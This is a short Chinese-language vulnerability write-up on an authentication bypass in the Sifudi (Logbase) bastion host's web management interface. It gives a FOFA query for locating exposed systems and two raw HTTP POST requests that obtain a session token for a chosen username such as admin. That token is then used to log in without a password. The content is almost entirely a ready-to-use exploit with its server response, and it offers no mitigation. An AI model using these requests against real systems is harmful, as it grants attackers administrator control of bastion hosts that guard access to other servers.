# 思福迪堡垒机 任意⽤户登录漏洞
## 漏洞描述
思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任 意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。
## 漏洞影响
`思福迪堡垒机`
## FOFA
`”Logbase运维安全管理系统”`
## 漏洞复现
获取INFO字段,u1参数值为⽤户名
“`bash
POST /bhost/set_session HTTP/1.1
Host: xxx.xxx.xxx.xx
u1=admin&m1=
“`
获得:`{“result”:true,”info”:”1562205376847″,”ErrMsg”:””}`
带⼊INFO字段进⼊如下请求的 a0 参数值中,uCode参数值为⽤户名
“`bash
POST /bhost/login_link HTTP/1.1
Host: xxx.xxx.xxx.xxx
a0=1562205376847&a1=&a10=2019-01-
01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=
“`
利用后即可登录后台
![](resource/任意用户登录漏洞/media/1.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容